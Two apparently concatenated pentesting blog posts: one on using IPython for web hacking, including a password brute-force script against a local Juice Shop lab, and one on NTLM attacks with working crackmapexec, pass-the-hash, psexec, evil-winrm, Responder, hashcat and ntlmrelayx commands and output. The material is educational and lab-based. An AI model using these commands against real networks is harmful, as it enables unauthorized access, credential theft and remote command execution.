# **Ipython3: A Hacker&apos;s Toolkit in Python**

Why opt for ipython3 in your web hacking toolkit? As highlighted in our introduction, ipython3 isn&apos;t just another interactive shell; it&apos;s a Python powerhouse tailored for streamlined and effective programming. Let&apos;s delve into why it stands out as a go-to resource for hackers and programmers alike.

1.  **Real-Time Error Insights:** One of ipython3&apos;s standout features is its ability to flag errors as you code. This real-time feedback transforms scripting from a trial-and-error exercise into an efficient, streamlined process.
2.  **Intuitive Auto-Completion:** Coding becomes smoother with ipython3&apos;s auto-completion capabilities. Imagine typing a few letters and having the shell suggest variables and functions. It&apos;s like having a knowledgeable companion guiding your coding journey.
3.  **Shell Command Execution:** Ipython3 blurs the lines between Python scripting and shell command execution. This flexibility allows you to seamlessly integrate Python&apos;s power with the versatility of shell commands, all within a single environment.
4.  **Pre-Session Code Execution:** Picture this - you start your ipython3 session, and your frequently used functions are already loaded and ready to go. This feature is a time-saver, keeping your favorite tools at your fingertips from the get-go.

In the hands of a web hacker, ipython3 is more than a tool; it&apos;s an extension of your skillset, making your explorations into web vulnerabilities more effective and insightful. Ready to see it in action? Let&apos;s dive deeper and discover the practical applications of ipython3 in web hacking scenarios.

## **Main Utilities of Ipython3: Tailoring Your Web Hacking Environment**

### **Profiles: Customizing Ipython3 for Web Hacking**

Ipython3 stands out not just as an interactive shell but as a flexible tool that can be finely tuned for specific tasks, like web hacking. One of its most powerful features is the ability to create profiles - customized environments tailored for specific tasks.

**Creating a Web Hacking Profile**

Let&apos;s start by setting up a profile specifically designed for web hacking. This is done with a simple command:

```bash
[rsgbengi@kaysel]$ ipython profile create web_hacking
[ProfileCreate] Generating default config file: PosixPath(&apos;/home/rsgbengi/.ipython/profile_web_hacking/ipython_config.py&apos;)
[ProfileCreate] Generating default config file: PosixPath(&apos;/home/rsgbengi/.ipython/profile_web_hacking/ipython_kernel_config.py&apos;)

```

This command creates a new profile, complete with its configuration files. The real magic happens in the &quot;startup&quot; subdirectory of this profile, where you can store scripts to run automatically at the session&apos;s start. It&apos;s like having your toolkit ready the moment you step into your workspace.

**Organizing Scripts for Efficiency**

In this &quot;startup&quot; directory, you can organize your scripts in a specific order, ensuring that your environment is set up just the way you need it. For instance, you might start with scripts that format output for better visibility:

```python
In [5]: from rich.console import Console

In [6]: from rich.syntax import Syntax

In [7]: def html(response: str) -&gt; None:
   ...:     syntax = Syntax(response, &quot;html&quot;)
   ...:     console = Console()
   ...:     console.print(syntax)
   ...:

```

Using the `rich` module, this script takes the HTML response of a request and formats it for a clearer, more visual display, dramatically enhancing your hacking session&apos;s efficiency.

![](/content/images/2023/05/image.png)

Sample request response without using rich module

![](/content/images/2023/05/image-1.png)

Sample execution of the html function

**Exploring Functionality with &apos;?&apos;:**

Ipython3 also offers the ability to explore the functionality of any function or class with the simple use of a &apos;?&apos;. It&apos;s like having a quick reference guide at your fingertips:

```python
In [7]: from rich.syntax import Syntax
In [8]: Syntax?
Init signature:
Syntax(
    code: str,
    lexer: Union[pygments.lexer.Lexer, str],
    *,
    theme: Union[str, rich.syntax.SyntaxTheme] = &apos;monokai&apos;,
    dedent: bool = False,
    line_numbers: bool = False,
    start_line: int = 1,
    line_range: Optional[Tuple[Optional[int], Optional[int]]] = None,
    highlight_lines: Optional[Set[int]] = None,
    code_width: Optional[int] = None,
    tab_size: int = 4,
    word_wrap: bool = False,
    background_color: Optional[str] = None,
    indent_guides: bool = False,
    padding: Union[int, Tuple[int], Tuple[int, int], Tuple[int, int, int, int]] = 0,
) -&gt; None
Docstring:
Construct a Syntax object to render syntax highlighted code.

Args:
    ...

```

This feature is invaluable for quickly understanding the capabilities and usage of different modules and functions.

**Saving and Reusing Code with %edit:**

When you find yourself frequently using a function, ipython3&apos;s `%edit` command is a lifesaver. It allows you to open your configured text editor, save your function, and ensure it&apos;s ready to use in your &quot;startup&quot; script:

```python

In [1]: def html(response: str) -&gt; None:
   ...:     syntax = Syntax(response, &quot;html&quot;)
   ...:     console = Console()
   ...:     console.print(syntax)
   ...:

In [2]: %edit html

# Content of 00-rich.py
from rich.console import Console
from rich.syntax import Syntax

def html(response: str) -&gt; None:
    &quot;&quot;&quot;Function to display the response to a request in a more visual way.&quot;&quot;&quot;
    syntax = Syntax(response, &quot;html&quot;)
    console = Console()
    console.print(syntax)

def start_web_hacking_session() -&gt; None:
    console = Console()
    console.print(&quot;----------[red] Web Hacking [/red]----------&quot;)

start_web_hacking_session()

```

By saving this to a script like `00-rich.py`, you make sure that every time you start this profile, your favorite tools are just a command away.

  
**Launching the Web Hacking Profile:**

Now, whenever you launch ipython3 with this profile:

```python
[rsgbengi@kaysel]$ ipython3 --profile=web_hacking

Python 3.11.2 (main, Feb  8 2023, 00:00:00) [GCC 12.2.1 20221121 (Red Hat 12.2.1-4)]
Type &apos;copyright&apos;, &apos;credits&apos; or &apos;license&apos; for more information
IPython 8.5.0 -- An enhanced Interactive Python. Type &apos;?&apos; for help.

IPython profile: web_hacking
---------- Web Hacking ----------

In [1]: html?
Signature: html(response: str) -&gt; None
Docstring: Function to display the response to a request in a more visual way.
File:      ~/.ipython/profile_web_hacking/startup/00-rich.py
Type:      function

```

You&apos;re immediately greeted with your custom web hacking environment, complete with all the tools and scripts you&apos;ve set up, streamlining your hacking process and making every session more productive.

### **Executing Shell Commands in Ipython3: Enhancing Your Workflow**

In the versatile world of ipython3, you&apos;re not confined to Python scripting alone. One of the standout features is the ability to execute shell commands within the ipython3 environment. This functionality is incredibly handy for file and directory management, eliminating the need to switch back and forth between Python and bash.

**Seamless Integration with Shell**

To demonstrate this seamless integration, let&apos;s dive into a practical example. Imagine you&apos;re working within a directory and want to quickly list and interact with its contents. In ipython3, this is as simple as prefixing your shell command with a &quot;!&quot; symbol:

```python

[rsgbengi@kaysel]$ ipython3

In [1]: files = !ls

```

Here, the `!ls` command behaves just like it would in a standard shell, listing the contents of the current directory. The output of this command is then stored in the Python variable `files`.

**Interacting with Command Output**

With the output stored in a Python variable, you have the full power of Python at your disposal to process and interact with these data:

```python
In [2]: for file in files:
   ...:     print(file)
   ...:
1.txt
2.txt
3.txt


```

In this example, we iterate over the list of files, printing out each file name. This level of integration showcases how ipython3 bridges the gap between Python scripting and shell command execution, making your web hacking sessions more fluid and efficient.

**Leveraging Ipython3 for Web Hacking**

In the context of web hacking, this capability opens up a world of possibilities. Whether you&apos;re managing files, interacting with databases, or handling network operations, ipython3&apos;s ability to execute shell commands means you can perform a wide range of tasks without ever leaving your Python environment.

# **Practical Use Cases: Applying Python in Pentesting**

## **Testing Authorization with Ipython3**

Imagine you&apos;ve gathered a list of URLs from an authenticated user and want to check if these are accessible to an unauthenticated user. Manually testing each URL can be tedious, but with Ipython3, we can automate this process efficiently. Let&apos;s see how:

### Gathering URLs

Load all the URLs into a list. In this example, we&apos;re using a list from the &apos;juice-shop&apos;, a commonly used vulnerable application for demonstration purposes.

```python
In [1]: urls = !cat storeurls.txt
In [2]: urls
Out[3]:
[&apos;http://localhost:3000/&apos;,
 &apos;http://localhost:3000/&apos;,
 &apos;http://localhost:3000/api&apos;,
 &apos;http://localhost:3000/api/Challenges&apos;,
 &apos;http://localhost:3000/api/Challenges/&apos;,
 &apos;http://localhost:3000/api/Challenges/?name=Score%20Board&apos;,
 &apos;http://localhost:3000/api/Quantitys&apos;,
 &apos;http://localhost:3000/api/Quantitys/&apos;,
 &apos;http://localhost:3000/assets&apos;,
 &apos;http://localhost:3000/assets/i18n&apos;,
 &apos;http://localhost:3000/assets/i18n/en.json&apos;,
 ...

```


### **Establishing a Verification Method**

The next step involves checking the accessibility of each URL. We&apos;ll use the response status code as an indicator: a status code of 200 implies access.

```python
import requests
import validators

def check_authorization_without_cookies(urls: list[str]) -&gt; dict[str, int]:
    responses = {}
    with requests.Session() as session:
        for url in urls:
            if url != &quot;&quot; and validators.url(url):
                print(&quot;[+] &quot; + url)
                response = session.get(url)
                responses[url] = response.status_code
            else:
                print(&quot;[-] Invalid URL&quot;)
    return responses

```

This function iterates through the URLs, makes GET requests, and stores the status codes in a dictionary for later use.

### **Displaying Results Visually**

To make the results more user-friendly, we utilize the `rich` module to create a table displaying each URL&apos;s status code.

```python
from rich.console import Console
from rich.syntax import Syntax
from rich.table import Table

def create_status_table(requests_info: dict[str, int]) -&gt; None:
    console = Console()
    table = Table(show_header=True, header_style=&quot;bold magenta&quot;)
    table.add_column(&quot;Url&quot;)
    table.add_column(&quot;Status Code&quot;)
    for key, value in requests_info.items():
        table.add_row(key, str(value))
    console.print(table)

```

![](/content/images/2023/05/image-2.png)

Sample of information obtained through the function &quot;create\_status\_table&quot;.
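Once the responses dictionary is filled in, a one-line filter is enough to isolate the endpoints an unauthenticated user can actually reach. The dictionary below is a made-up sample in the style of the juice-shop URLs above:

```python
# Hypothetical sample of status codes collected for each URL.
responses = {
    "http://localhost:3000/api/Challenges": 200,
    "http://localhost:3000/rest/basket/1": 401,
    "http://localhost:3000/ftp": 200,
}

# Keep only the URLs that answered 200 to an unauthenticated GET.
accessible = [url for url, status in responses.items() if status == 200]
for url in accessible:
    print(url)
```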

## **Brute Force Login Attack**

Another practical use case is performing brute force attacks to crack a user&apos;s password.

### **Defining the Brute Force Function:**

This function attempts to log in with different passwords until the correct one is found.

```python
def login_user_bruteforzing(url: str, username: str, passwords: list[str]) -&gt; dict[str, int]:
    results = {}
    console = Console()
    with console.status(f&quot;[bold green] Bruteforzing the user {username}&quot;) as status:
        for password in passwords:
            with requests.Session() as session:
                console.log(f&quot;Password: {password}&quot;)
                data = {&quot;email&quot;: username, &quot;password&quot;: password}
                response = session.post(url, data=data)
                results[password] = response.status_code

    return results

```

It should be noted that with POST requests we often do not know in advance in what format and structure the data is sent. To find out, we can intercept the request with Burp Suite, as shown in the following figure:

![](/content/images/2023/05/image-3.png)

Captured request to study parameters sent

### **Executing the Attack**

Load the list of potential passwords, set the username and target URL, and run the function.

```python
In [1]: words = !cat /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt

In [2]: username = &quot;test@gmail.com&quot;

In [3]: url = &quot;http://localhost:3000/rest/user/login&quot;

In [4]: results = login_user_bruteforzing(url, username, words)

```

### **Visualizing Results**

Use the `rich` module to display results in a table format, making it easier to spot the successful password attempt by the change in status code.

![](/content/images/2023/05/image-4.png)

Sample results of brute force attack on login panel
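Beyond the table, the same idea can be expressed directly in code: filter the results dictionary for the attempt whose status code differs from the failures. The dictionary below is a hypothetical sample, assuming the application answers 401 to a failed login:

```python
# Hypothetical results as returned by login_user_bruteforzing:
# most attempts fail with 401; the valid password stands out with a 200.
results = {"123456": 401, "password": 401, "letmein": 200, "qwerty": 401}

hits = [pwd for pwd, status in results.items() if status != 401]
print(hits)
```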

# **Conclusion: Harnessing Python and Ipython3 in Web Hacking**

As we conclude our exploration of using Python and Ipython3 in web application hacking, it&apos;s clear that these tools offer immense potential in the realm of cybersecurity. Throughout this article, we&apos;ve uncovered the power of Python not just as a programming language, but as a pivotal tool in the hands of web hackers and penetration testers.

**Key Takeaways:**

1.  **Versatility of Ipython3:** We&apos;ve seen how Ipython3 transcends being a mere interactive shell, evolving into a versatile platform for executing shell commands, automating tasks, and enhancing the efficiency of hacking exercises.
2.  **Streamlining Pentesting Processes:** The ability to create profiles, execute shell commands, and visually display data in Ipython3 significantly streamlines the penetration testing process. This efficiency is vital in a field where speed and accuracy are paramount.
3.  **Real-World Application:** The practical use cases, from testing authorization vulnerabilities to conducting brute force login attacks, demonstrate Python&apos;s and Ipython3&apos;s real-world applicability. These examples illustrate not just theoretical knowledge, but practical skills that can be directly applied in pentesting scenarios.
4.  **Continual Learning and Adaptation:** The journey through Python and Ipython3 in web hacking is a testament to the importance of continual learning and adaptation in cybersecurity. As threats evolve, so must our tools and techniques.

This article serves as a bridge between understanding Python&apos;s fundamental concepts and applying them in the specialized context of web application security. Whether you&apos;re a seasoned hacker or a novice in the field, the insights gained here are invaluable in navigating the ever-changing landscape of cybersecurity.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What is the main use of the profiles?&lt;/summary&gt;

A profile is mainly used to group a set of code that is commonly used. In this way, in conjunction with sessions, we can adapt ipython3 to a particular task we are performing.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What is the main use of the requests library and the rich library?&lt;/summary&gt;

The requests library is used to send HTTP requests and handle their responses in a simple and fast way. The rich library, on the other hand, is used to format the output of our scripts so that the results are displayed in a more visual way.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What can I use Burp Suite for when scripting?&lt;/summary&gt;

I can study the format of the requests made from the client to the server so that, for example, I can know what parameters are sent in POST requests.
&lt;/details&gt;

# References

[25 IPython Tips for Your Next Advent of Code](https://switowski.com/blog/25-ipython-tips-for-your-next-advent-of-code/)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering NTLM: Exploring Authentication, Vulnerabilities, and Exploits</title><link>https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics</link><guid isPermaLink="true">https://www.kayssel.com/post/introduction-to-active-directory-6-ntlm-basics</guid><description>In this guide on NTLM, Microsoft&apos;s authentication protocol, we explore its three-step process and delve into various attacks like &apos;Pass the Hash&apos; and NTLM Relay. Techniques like reconnaissance, credential validation, and hash retrieval are examined, highlighting NTLM&apos;s role in network security.</description><pubDate>Fri, 21 Apr 2023 16:43:34 GMT</pubDate><content:encoded># **Introduction: Deciphering NTLM - Microsoft&apos;s Authentication Protocol**

  
Welcome to the fascinating world of NTLM, Microsoft&apos;s own brainchild for authentication, stepping up from the older, less secure LM protocol. Picture NTLM as a digital handshake, ensuring two Windows computers communicate securely.

Here&apos;s the clever part: NTLM uses a challenge-response technique, a kind of secret whisper, so users are verified without sending their passwords in plain sight. Instead, it cleverly transmits a hash, known as the Net-NTLMv1 or Net-NTLMv2 hash, depending on the NTLM version in play.

These hashes aren&apos;t just random numbers; they&apos;re crafted from the user&apos;s NT hash, a digital fingerprint found in the SAM or NTDS. Take the Net-NTLMv2 hash, for example, it&apos;s essentially a HMAC\_MD5, a digital signature, concocted from this NT hash.

![](/content/images/2023/04/image-9.png)

NT hash and Net-NTLMv2 example

NTLM is a bit of a backstage artist, not creating traffic by itself but subtly weaving into other protocols like SMB, LDAP, or HTTP, adding a layer of authentication without making a scene.

In the world of active directory, Kerberos usually steals the limelight as the go-to authentication protocol. But NTLM isn&apos;t out of the game – it sneaks in when you connect to a network machine using an IP address instead of a hostname. This is because Kerberos needs hostnames to work its magic. So, when you&apos;re accessing a shared folder with \\\\ip\\&lt;shared\_folder&gt;, that&apos;s NTLM&apos;s moment to shine, while \\\\hostname\\&lt;shared\_folder&gt; is a Kerberos show.
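That hostname-versus-IP rule can be captured in a small, admittedly rough Python sketch. The function name and the heuristic itself are mine, purely illustrative, not an official API:

```python
import ipaddress

def likely_auth(host):
    """Rough guess at which protocol a UNC target will trigger (sketch only)."""
    try:
        ipaddress.ip_address(host)
        return "NTLM"      # IP address: Kerberos has no hostname to build an SPN
    except ValueError:
        return "Kerberos"  # hostname: Kerberos can request a ticket for the SPN

print(likely_auth("192.168.253.131"))  # NTLM
print(likely_auth("dc01.shadow.local"))  # Kerberos
```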

So, let&apos;s dive deeper into NTLM, a protocol that might not always be in the spotlight, but plays a crucial role behind the scenes in network security and user authentication.

# **Bridging to NTLM Authentication Process**

![](/content/images/2023/04/image-2.png)

NTLM Authentication process diagram

After exploring NTLM&apos;s foundations, let&apos;s delve into its authentication process. This process elegantly unfolds in three distinct steps: Negotiate, Challenge, and Authenticate, each playing a vital role in the authentication symphony.

1.  **Negotiate: Setting the Stage**  
    The Negotiate message is like the opening act, initiating the authentication process. Here, it&apos;s not just a casual hello; it proposes the NTLM protocol version to be used. Think of it as laying down the ground rules for the conversation.
2.  **Challenge: The Server&apos;s Move**  
    Responding to the negotiate message, the server throws a challenge – a string of pseudo-random characters, like a cryptic puzzle to be solved. Along with this, it confirms the NTLM protocol version and shares essential details like the Hostname and domain name. This step is crucial; it&apos;s the server&apos;s way of ensuring that the client is ready for the next move.
3.  **Authenticate: The Final Check**  
    Now it&apos;s the client&apos;s turn to shine. The client takes the server&apos;s challenge and encrypts it using the user&apos;s NT hash, crafting what&apos;s known as the Net-NTLM hash. This encrypted message, sent back to the server, is like the client&apos;s secret handshake. The server, upon verifying this response, completes the user&apos;s authentication. It&apos;s the final nod of approval, sealing the deal on the user&apos;s identity.

Each step in this process is designed so that the user&apos;s password never travels over the wire in plain text. Even so, as we are about to see, this challenge-response design still leaves plenty of room for abuse.
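For the curious, the Authenticate step can be sketched in a few lines of Python following the NTLMv2 formulas from the MS-NLMP specification. This is a simplified illustration: the NT hash, user and domain are sample values, and the blob is a stub (a real blob carries a timestamp, a client nonce and target information):

```python
import hashlib
import hmac

def hmac_md5(key, data):
    return hmac.new(key, data, hashlib.md5).digest()

# Sample inputs: an NT hash (hex), the 8-byte server challenge, a stub blob.
nt_hash = bytes.fromhex("c4b0e1b10c7ce2c4723b4e2407ef81a2")
server_challenge = bytes.fromhex("0123456789abcdef")
blob = b"\x01\x01" + b"\x00" * 6  # placeholder; real blobs are much richer

# Step 1: derive the NTLMv2 response key from the NT hash, user and domain.
user_domain = ("beruinsect".upper() + "SHADOW.local").encode("utf-16-le")
response_key = hmac_md5(nt_hash, user_domain)

# Step 2: the Net-NTLMv2 proof is an HMAC-MD5 over the challenge plus the blob.
nt_proof = hmac_md5(response_key, server_challenge + blob)
print(nt_proof.hex())  # 16-byte proof sent back to the server alongside the blob
```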

# **Transitioning to NTLM Attacks**

With a clear understanding of the NTLM authentication process, we&apos;re now well-equipped to delve into the realm of NTLM attacks. This next section will illuminate the strategies and vulnerabilities inherent in NTLM&apos;s design.

## **Reconnaissance Tasks: Gathering Intelligence**

Remember our journey through [chapter three](https://www.kayssel.com/post/active-directory-3-windows-computers/)? We used SMB via Python and the Impacket library to nudge NTLM into revealing domain information. Tools like &quot;ntlm-info&quot; are also key players in this reconnaissance game. The server&apos;s &quot;Challenge&quot; message is a treasure trove, potentially spilling secrets like domain name, hostname, and even the operating system version.

![](/content/images/2023/04/image.png)

Information obtained by forcing the use of NTLM via SMB

## **From Reconnaissance to Credentials**

Now, shifting our focus from general attacks, we explore how NTLM is integral in credential discovery and validation. SMB is often the path of choice here, given its widespread activation across active directory systems. Imagine you have a list of users and suspect that &quot;Password1&quot; might be a common password. Here&apos;s how you&apos;d test that theory:

```bash
crackmapexec smb 192.168.253.130 -u users.txt -p Password1

```

![](/content/images/2023/04/crackmap.png)

Password Spraying diagram

This method, known as &quot;Password Spray,&quot; involves trying the same password with multiple users to sniff out valid credentials. While we&apos;ve used crackmapexec here, alternatives like Kerbrute employ the Kerberos protocol for user enumeration.

Once credentials are in hand, crackmapexec can also validate them across different domain machines, determining access levels and privileges. Symbols like \[+\], \[-\], and (Pwn3d!) indicate access status. This last one is the most important since it indicates the possibility of remote command execution.

![](/content/images/2023/04/image-6.png)

Sample credential checking via NTLM using SMB

## **Brute Force: The Last Resort**

In desperate times, brute force attacks come into play. They&apos;re the digital equivalent of trying every key on the keyring:

```bash
crackmapexec smb 192.168.253.128 -u &quot;ironhammer&quot; -p password.txt

```

Remember, domain password policies are crucial here. These attacks can lock out user accounts, so understanding the policy is vital. You can use crackmapexec with a valid user to fetch this policy:

```bash
crackmapexec smb 192.168.253.128 -u &quot;beruinsect&quot; -p &quot;Password3&quot; --pass-pol

```

![](/content/images/2023/04/image-10.png)

Password Policy

An example of a weak password policy, with no account lock threshold, suggests free rein for brute force attacks without the worry of hindering user activities.

## **Introducing Pass the Hash Technique**

Having looked at credentials, we now move to one of NTLM&apos;s most notable techniques - &apos;Pass the Hash&apos;. Picture this: Instead of using the actual password, this clever trick passes the NT hash of the user&apos;s password. It&apos;s a digital sleight of hand, possible because NTLM&apos;s authentication process uses the NT hash, not the plain text password.

Imagine we&apos;ve managed to dump the SAM of a Domain computer (as outlined in [chapter 4](https://www.kayssel.com/post/active-directory-4-secrets-in-windows-systems/)). With this in hand, we unlock the ability to use the NT hash of various users. This is like having a master key – we can now explore where these users have access and their privileges, all without needing their actual password. It&apos;s a bit like being a digital locksmith.

```bash
SHADOW.local\beruinsect:1103:aad3b435b51404eeaad3b435b51404ee:c4b0e1b10c7ce2c4723b4e2407ef81a2:::

```

NT hash

![](/content/images/2023/04/image-11.png)

Pass the hash with crackmapexec

Let&apos;s say we hit the jackpot and get a &quot;pwn3d!&quot; result in crackmapexec. Now, the door is wide open for us to execute commands:

```bash
crackmapexec smb &lt;ip&gt; -u &lt;user&gt; -H &lt;nt_hash&gt; -x &lt;command_to_execute&gt;

```

![](/content/images/2023/04/image-12.png)

Pass the hash to execute commands

This command is our magic wand, turning possibilities into realities. And there&apos;s more – we can conjure up an interactive shell using tools like psexec or evil-winrm. It&apos;s like stepping into the digital world of the target machine:

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ impacket-psexec beruinsect@192.168.253.131 -hashes &quot;:c4b0e1b10c7ce2c4723b4e2407ef81a2&quot;
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 192.168.253.131.....
[*] Found writable share ADMIN$
[*] Uploading file ESkUGYGM.exe
[*] Opening SVCManager on 192.168.253.131.....
[*] Creating service NseE on 192.168.253.131.....
[*] Starting service NseE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;

```

Or, for a different flavor of digital intrusion:

```bash
┌──(rsgbengi㉿kali)-[~]
└─$ evil-winrm -u vaan -H &quot;64f12cddaa88057e06a81b54e73b949b&quot; -i 192.168.253.130

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\vaan\Documents&gt;

```

&quot;Pass the Hash&quot; is more than just an attack; it&apos;s a testament to NTLM&apos;s intricacies and a reminder of the ever-evolving landscape of network security.

## **Connecting to Net-NTLM Hashes Retrieval**

After exploring the &apos;Pass the Hash&apos; technique, a key exploit within NTLM, we now turn our attention to another crucial aspect: retrieving Net-NTLM hashes. This step is vital in active directory security auditing, where uncovering valid credentials often proves challenging.

Venturing into the realm of active directory security auditing can be a tough nut to crack, especially when hunting for valid credentials. But there&apos;s a tool for that – &quot;[Responder](https://github.com/lgandx/Responder),&quot; a master at man-in-the-middle attacks to snag those elusive Net-NTLM hashes from users. It&apos;s like setting a digital trap in the organization&apos;s internal network (sorry, VPN users, this won&apos;t work for you). Here&apos;s how you set the stage:

```bash
sudo responder -I eth0

```

This command is the conductor of a two-part orchestra:

1.  **Poisoning Protocols:** MDNS, LLMNR, and NBT-NS protocols are subtly manipulated to reroute network resource resolutions. It&apos;s like laying out digital breadcrumbs, leading unsuspecting connections right to the attacker&apos;s lair.
2.  **Setting up Malicious Servers:** These servers are the puppeteers, pulling the strings to make NTLM the go-to for all incoming connections.

With this setup, you&apos;re not just intercepting traffic; you&apos;re capturing Net-NTLM hashes as they waltz through the NTLM authentication process. It&apos;s a stealthy move, akin to a magician&apos;s sleight of hand.
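
For a concrete picture of what gets poisoned, here is a minimal sketch in Python of the LLMNR name query (DNS wire format over UDP 5355, per RFC 4795) that a victim multicasts when name resolution fails; the hostname and transaction id are hypothetical:

```python
import struct

def llmnr_query(hostname: str, txid: int = 0x1337) -> bytes:
    # 12-byte header: id, flags, QDCOUNT=1, AN/NS/AR counts = 0
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
    # DNS-style label: length byte, name, terminating zero
    name = bytes([len(hostname)]) + hostname.encode("ascii") + b"\x00"
    question = name + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return header + question

# A victim resolving a nonexistent share name broadcasts something like this
pkt = llmnr_query("fileserver")
print(len(pkt), pkt.hex())
```

Responder simply answers packets of this shape with an A record pointing at the attacker, which is what funnels the victim into authenticating over NTLM.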

To make this even more effective, let&apos;s say a user tries to access a nonexistent network share while Responder is lurking in the shadows. That&apos;s when you catch the prized Net-NTLMv2 hash.

![](/content/images/2023/04/image-13.png)

Search for a network resource that does not exist for a user

![](/content/images/2023/04/image-15.png)

Prompt shown to the user, triggered by &quot;responder&quot;

![](/content/images/2023/04/image-16.png)

Net-NTLMv2 hash capture

Got the hash? Now it&apos;s time to crack it open using hashcat, the digital equivalent of a safe cracker:

```bash
hashcat -m 5600 hashresponder.hashcat /usr/share/wordlists/rockyou.txt

```

![](/content/images/2023/04/image-17.png)

Net-NTLMv2 cracking
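
What mode 5600 recomputes for each candidate password is a short HMAC-MD5 chain. Below is a minimal Python sketch; the user, domain, challenge, and blob values are hypothetical placeholders, and the NT hash used is the well-known hash of the empty password (normally it would be MD4 of the UTF-16LE password, skipped here so the sketch runs without an MD4 implementation):

```python
import hmac
from hashlib import md5
from binascii import hexlify, unhexlify

# NT hash of the candidate password. Normally this is MD4(UTF-16LE(password));
# the constant below is the well-known NT hash of the empty password.
nt_hash = unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0")

user, domain = "vaan", "KAYSSEL"  # hypothetical values from the captured line
server_challenge = bytes(8)       # 8-byte server challenge (placeholder)
blob = bytes(16)                  # timestamp + client-challenge blob (placeholder)

# Step 1: NTLMv2 key = HMAC-MD5 keyed with the NT hash over UPPER(user) + domain
ntlmv2_key = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), md5).digest()

# Step 2: NTProofStr = HMAC-MD5 keyed with that key over challenge + blob.
# hashcat compares this against the proof field of the captured hash line.
proof = hmac.new(ntlmv2_key, server_challenge + blob, md5).digest()
print(hexlify(proof).decode())
```

If the recomputed proof matches the one Responder captured, the candidate password is the user&apos;s password.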

This approach to obtaining Net-NTLM hashes is more than just a technical feat; it&apos;s a dance of strategy, timing, and skill, proving that sometimes the most effective attacks are those that remain unseen.

## **Leading to NTLM Relay Attack**

### **Introduction to NTLM Relay Attack**

From capturing hashes, we now transition to a more direct form of attack - the NTLM Relay. A sophisticated technique that hijacks connections through protocol poisoning. This strategy revolves around rerouting connections, initially aimed at the attacker&apos;s computer, to a target machine. The key? These intercepted connections, especially from administrator users, become a powerful tool for executing commands on the target system.

![](/content/images/2023/04/image-24.png)

NTLM Relay attack

### **Setting Up: Configuring the Players**

For this attack to hit the mark, the captured connections must come from a user with administrator privileges on the victim machine. It&apos;s like choosing the right chess piece for a strategic move. Here&apos;s how to set the stage:

-   **Elevating User Privileges:** First, dive into &quot;Computer Management&quot; and access &quot;Local Users and Groups.&quot; Navigate to &quot;Groups&quot; and elevate your chosen user to the administrator level. It’s like handing them the digital keys to the kingdom.

![](/content/images/2023/04/image-19.png)

Iron in the administrator&apos;s group

-   **Prepping the Stage:** Tweak the basic Responder configuration to prevent conflicts with upcoming tools. This involves editing the responder.conf file to turn off SMB and HTTP, ensuring a clear path for our next move.

![](/content/images/2023/04/image-20.png)

Responder configuration

### **Launching the Attack: The Dance of Protocols**

With the setup complete, launch Responder to start the protocol poisoning:

```bash
sudo responder -I eth0

```

This command is the opening gambit, manipulating LLMNR, MDNS, and NBT-NS protocols to funnel connections towards the attacker&apos;s machine.

### **Enter ntlmrelayx: Redirecting Connections**

The next step involves ntlmrelayx, a tool that strategically redirects these connections to the target machine, like a digital redirect sign:

```bash
impacket-ntlmrelayx -tf targets.txt -smb2support

```

```bash
# targets.txt
192.168.253.131

```

### **Executing the Attack: The Moment of Truth**

Once the poisoned request from the &apos;iron&apos; user is captured, it’s rerouted to PC-BERU. If &apos;iron&apos; has administrator access, the floodgates open to command execution. The attack&apos;s climax is marked by dumping the SAM, revealing the sensitive underbelly of the target system.

![](/content/images/2023/04/image-21.png)

Attack preparation

![](/content/images/2023/04/image-22.png)

NTLM Relay with responder and ntlmrelayx

### **Crafting the Illusion: Forcing a Connection**

The final act involves luring a user into accessing a nonexistent network resource. When the attack concludes, the user is met with an error message – the only visible sign of the intricate dance that just occurred in the digital shadows.

![](/content/images/2023/04/image-23.png)

Error caused by ntlmrelayx

# **Conclusion: Navigating the Intricacies of NTLM Security**

As we conclude our exploration of NTLM, it&apos;s clear that this protocol is a double-edged sword in the realm of network security. From the sophisticated &quot;Pass the Hash&quot; technique to the cunning NTLM Relay attacks, we&apos;ve seen how NTLM can be both a stalwart defender and a vulnerable point of exploitation.

Our journey has taken us through various tactics, from reconnaissance and credential discovery to man-in-the-middle attacks. Each method has demonstrated the importance of understanding NTLM&apos;s nuances, not just for exploiting its weaknesses but also for fortifying its defenses.

The tools and techniques discussed — Responder for capturing Net-NTLM hashes, crackmapexec for credential validation, and the strategic use of ntlmrelayx — highlight the need for continuous vigilance and adaptation in the ever-evolving landscape of network security.

This article serves as a reminder that in the digital world, knowledge is power. Understanding the capabilities and vulnerabilities of protocols like NTLM is crucial for both attackers and defenders in the cybersecurity arena. As we continue to navigate these digital waters, let&apos;s carry forward the insights and lessons learned, ensuring we stay one step ahead in the ongoing game of network security.

# Tips of the article


&lt;details&gt;
&lt;summary&gt;What three main messages does the NTLM authentication process consist of?&lt;/summary&gt;

It consists of &quot;Negotiation&quot;, &quot;Challenge&quot; and &quot;Authentication&quot;.

![](/content/images/2023/04/image-2.png)
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;What information were you able to collect that may be of interest during the NTLM authentication process?&lt;/summary&gt;

I can find out the HostName of the machine as well as the version of the operating system it is using. To find this information, I can use the tool &quot;ntlm-info&quot;.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;How can I use crackmapexec to validate users in the domain? Can I tell from the result whether the user is a local administrator or not?&lt;/summary&gt;

